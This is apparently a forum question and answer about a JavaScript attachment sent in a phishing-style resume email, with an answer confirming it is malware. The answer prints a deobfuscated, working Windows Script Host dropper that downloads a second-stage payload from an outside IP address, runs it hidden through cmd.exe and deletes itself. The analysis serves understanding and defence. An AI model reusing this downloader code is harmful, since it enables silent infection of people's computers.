How can I know if there is a javascript virus?
So I got a random email saying this. Looks very automated:
"How are things? I was visting your website on 4/9/2016 and I'm very interested. I'm currently looking for work either full time or as a intern to get experience in the field. Please review my Resume and let me know what you think.
Then a javascript file attached. I scanned it on VirusTotal finding only 1/55. I have opened the file to look at the text and have copy pasted it into this dump file as it is quite long. Anyone familiar with javascript can confirm that it is a virus or not?
It most certainly is a javascript virus. It uses JavaScript with ActiveX* and VBScript to download and execute a stage two payload that does something else. Although it is written in JavaScript, it is not executed in the browser. Instead, it is executed in the Windows Script Host when it is double-clicked. This is the deobfuscated and abridged version of the function sQl dib from the file:
// download and execute stage 2 payload
function stage1_payload() {
// connect to server hosting stage 2 payload and download into memory
var http_obj = new ActiveXObject("MSXML2.XMLHTTP");
http_obj['open']("GET", "http://94.102.63.7/macbook_tutorial.mov", false);
http_obj['send']();
// evaluates true only if http connection succeeded
if (http_obj['Status'] == 200) {
// open activex objects for filesystem and file access
var fs_obj = new ActiveXObject("Scripting.FileSystemObject");
var file_obj = new ActiveXObject("ADODB.Stream");
// create and open temporary file (as binary) in system temporary folder
var temp_file = fs_obj['GetSpecialFolder'](2) + '' + fs_obj['GetTempName']();
file_obj['Open']();
file_obj['Type'] = 1;
// save response body containing stage 2 payload to temporary file
file_obj['Write'](http_obj['ResponseBody']);
file_obj['Position'] = 0;
file_obj['SaveToFile'](temp_file);
file_obj['Close']();
// execute temporary file using command prompt
var shell_obj = new ActiveXObject("WScript.Shell");
shell_obj['run']('cmd.exe /c ' + temp_file, 0);
}
// delete currently-executing script (the js file you received)
var script_name = WScript['ScriptFullName'];
fs_obj['deleteFile'](script_name);
}